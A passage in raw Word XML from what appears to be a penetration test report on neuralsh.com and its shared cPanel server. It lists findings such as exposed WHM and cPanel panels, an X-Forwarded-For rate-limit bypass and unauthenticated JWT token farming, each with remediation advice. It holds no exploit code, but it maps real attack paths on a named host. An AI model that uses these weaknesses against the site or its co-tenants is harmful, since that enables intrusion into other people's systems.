        <w:t>N-002: MikroTik Admin Panel Exposed (Port 9001)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103.16.xx.xxx:9001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MikroTik RouterOS admin interface is accessible from any IP on port 9001, pre-filling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the default username. If the factory default blank password has not been changed, an attacker gains full network device control — routing tables, firewall rules, and live traffic capture.</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9001 to a trusted management IP. Change MikroTik default credentials and disable unused services (telnet, FTP, API).</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4.11 — curl response confirming RouterOS login page on port 9001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-013: cPanel Admin Panel Exposed (Port 2083)</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9.8</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hosting panel is accessible on port 2083 with no IP restriction or two-factor authentication. Access grants full control of hosted files, databases, email accounts, and FTP credentials.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2083 to trusted management IPs via Cloudways firewall and enable two-factor authentication on cPanel immediately.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cPanel Login page on port 2083</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-014: WHM Root Panel Exposed (Port 2087)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8B0000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:2087</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WHM (Web Host Manager) is the root-level server admin panel, accessible on port 2087 with no IP restriction, no two-factor authentication, and no lockout. WHM provides a built-in terminal (root shell), full cPanel account management, and database access — a single compromise exposes every domain hosted on the server. This is the highest-severity finding in the engagement (CVSS 10.0).</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2087 to trusted IPs via Cloudways firewall and enable two-factor authentication. This single change eliminates the highest-risk attack vector in the engagement.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4.10 — curl response confirming WHM Login page on port 2087</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-003: SSH Port 22 Publicly Accessible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7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap, ssh</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OpenSSH 8.9p1 is accessible on port 22. Key-based authentication was confirmed for tested accounts, reducing immediate brute-force risk. However, any account with password authentication enabled remains vulnerable, and successful SSH access on a shared cPanel server is equivalent to root.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Enforce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PasswordAuthentication no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, install fail2ban, and restrict port 22 to a trusted management IP.</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4.9 — Nmap scan confirming 22/tcp open OpenSSH 8.9p1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-004: Shared Hosting Lateral Movement Risk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 (shared)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>openssl,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 is a shared cPanel environment (Cloudways / cprapid.com) hosting multiple tenants, confirmed by SSL certificates issued to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*.onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. A single WHM-level compromise exposes all co-hosted accounts — their files, databases, and email — simultaneously.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Migrate neuralsh.com to dedicated or isolated hosting. As an immediate step, restrict WHM to trusted IPs to eliminate the direct lateral movement path.</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SSL certificate disclosing co-tenant domains on the same origin server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-005: Rate Limit Bypass via X-Forwarded-For Spoofing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9.1</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Burp Suite, curl, Python</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rate limiter uses the client-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header as the source IP identifier. By rotating a different IP value on each request, all 50 test requests received HTTP 200 — a 100% bypass rate with zero rate-limit responses returned.</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X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Cloudflare's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CF-Connecting-IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header for all rate-limiting logic. Unlike </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, this header is set by Cloudflare and cannot be spoofed by the client.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50/50 requests bypassed rate limiting successfully</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-007: Unauthenticated JWT Token Issuance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neuralsh.com/web/v1/init/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>curl, CyberChef, hashcat</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint issues a signed JWT to any caller — no credentials, API key, or fingerprint required. Combined with the N-005 rate-limit bypass, 50 valid tokens were farmed in approximately three seconds, each granting real API access.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Require a Cloudflare Turnstile challenge or browser fingerprint before issuing tokens, and implement token binding to the originating session.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4.15 — 50 tokens farmed; Figure 4.16 — endpoint confirmed live (HTTP 200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-006: API Routes Exposed in Client-Side JavaScript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neuralsh.com/_nuxt/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>curl, grep</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All API routes are embedded in the public Nuxt.js JavaScript bundle. Routes including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/text/search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/web/v1/report/save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> were extracted without authentication, eliminating the need for directory brute-force and enabling targeted exploitation of N-005 and N-007.</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Minimise route exposure in the compiled bundle and implement an API gateway with strict allowlisting. Treat all API endpoints as publicly known and secure them at the application layer.</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API routes extracted from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/_nuxt/Bpuv52g-.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-008: SSL Certificate Mismatch on Backend Server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5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:443, :110, :143, :465</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>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origin server's HTTPS certificate is issued to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.endoncambodia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, not neuralsh.com, and mail certificates belong to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*.onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. Clients connecting directly to the origin IP receive a certificate mismatch warning, confirming SSL management has not been maintained for this shared hosting environment.</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Issue a dedicated SSL certificate for neuralsh.com at the origin server level, or ensure the server certificate covers all hosted domains as Subject Alternative Names (SANs).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4.8 — openssl output showing certificate subject mismatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-009: Content Security Policy Allows unsafe-inline Scripts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5.4</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The Content-Security-Policy header includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>script-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, allowing execution of any inline JavaScript. If an XSS vulnerability exists anywhere in the application, this CSP setting provides no protection against inline script injection.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Replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'unsafe-inline'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> with per-request nonces using Nuxt.js's built-in CSP nonce support.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headers confirming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>script-src 'self' 'unsafe-inline'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-010: Wildcard DNS Record Configured</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4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>*.neuralsh.com</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 wildcard DNS record routes any subdomain of neuralsh.com to 103.16.xx.xxx. Attackers can use convincing subdomains such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>login.neuralsh.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in phishing campaigns that resolve to a real IP address, increasing their credibility.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Remove the wildcard DNS record from Cloudflare and define only explicit records for legitimate subdomains such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mail.neuralsh.com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Figure 4.7 — dig confirming randomxyz123.neuralsh.com resolves to 103.16.xx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-016: Directory Listing Enabled on Apache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5.3</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Apache directory listing is enabled on the origin server, returning an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Index of /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> page for direct HTTP requests. Any deployed application files would be listed with filenames and modification timestamps, providing a full directory map without scanning.</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Add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Options -Indexes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Apache configuration or a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in the document root.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103.16.xx.xxx returning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Index of /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-020: Shared Hosting Co-Tenant Confirmed: onesala.com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FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>curl, openssl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HTTP redirects from ports 2077 and 2082 explicitly name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.onesala.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a co-tenant on the same physical server. This confirms N-004 with an identified third-party victim — a compromise of neuralsh.com's server now has documented data protection implications for onesala.com.</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No application-level fix is available. Migrate to isolated infrastructure and restrict WHM access immediately to prevent exploitation of the co-tenancy risk.</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showing redirect from 103.16.xx.xxx:2077 to www.onesala.com:2078</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-015: Webmail Interface Exposed (Port 2096)</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103.16.xx.xxx:2096</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The cPanel Webmail login page is accessible on port 2096 with no IP restriction or account lockout. It allows brute-force attempts against all hosted email accounts, and a compromised email address can be used to reset passwords on cPanel and linked services.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 2096 to trusted IPs via firewall and implement an account lockout policy on the webmail login.</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Nmap scan confirming 2096/tcp open — cPanel Webmail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-018: Additional cPanel Management Ports Exposed (2078, 2091)</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C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>103.16.xx.xxx:2078, :2091</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap, 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Ports 2078 and 2091 were absent in the June 6 baseline but appeared open in the June 10 follow-up, both returning HTTP 401 Basic Auth challenges. Their undocumented addition indicates infrastructure changes are occurring without a security review process.</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Restrict ports 2078 and 2091 via firewall and conduct a full port audit to close all ports without a documented business purpose.</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Follow-up Nmap scan (10 June 2026) confirming 2078/tcp and 2091/tcp open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
